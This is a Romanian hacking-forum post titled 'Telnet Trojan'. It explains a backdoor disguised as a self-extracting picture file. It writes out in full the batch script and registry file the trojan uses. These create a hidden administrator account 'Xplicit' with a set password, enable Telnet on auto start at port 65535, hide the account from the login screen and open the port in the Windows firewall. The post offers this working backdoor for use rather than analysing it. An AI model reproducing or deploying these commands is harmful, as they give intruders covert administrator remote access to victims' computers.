Jump to content
Cristtyan

Telnet Trojan

By Cristtyan, in Programe hacking

Recommended Posts

DarkSpider Newbie

DarkSpider

Posted
Posted

deci ce face ami exact acest backdoor?

aveti nevoie de winrar ptr a raspunde la intrebare(nu va intrebati de cand o devenit winrar-ul utilitar de hack ca nu va pot raspunde)

deci o luam cu inceputul poza.exe este un selfextract.extrageti fisierele din ea prin click dreapta extractct.

vor aparea 4 fisiere:

gu.exe(gu=gost user)este vulnerabilitatea pe care sa creat backdoorul.mai concret acest .exe creaza un user(daca rulati poza.exe veti vedera in documents&settings inca un user 'xplicit'.

picture.cmd

sc config TlntSvr start= auto

%windir%SecurityTelnetgu Xplicit test123 "pulamea"

%windir%regedit.exe /s %windir%SecurityTelnetRegedit.reg

NET LOCALGROUP TelnetClients /ADD /COMMENT:"Telnet Server for OWNING PCs"

NET LOCALGROUP TelnetClients Xplicit /ADD

NET LOCALGROUP Administrators Xplicit /ADD

net start TlntSvr

exit

intelegeti voi ce scrie mai sus daca nu invatzati :P

picture.bat

un shortcut la cmd

click dreapta>propertis pe picture.bat (vedeti voi ce scrie pe acolo)

regedit.reg care de asemenea face urmatoarele

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer1.0]

"NTLM"=dword:00000001

"TelnetPort"=dword:0000ffff



[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTlntSvr]

"ErrorControl"=dword:00000001

"Start"=dword:00000002

"Type"=dword:00000010

"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]

"Xplicit"=dword:00000000



[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList]

"65535:TCP"="65535:TCP:*:Enabled:@xpsp2res.dll,-22003"

stiti voi ce inseamna daca nu invatzat sau intrebatzi pe cine stie :D

si cam astai tot

B)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...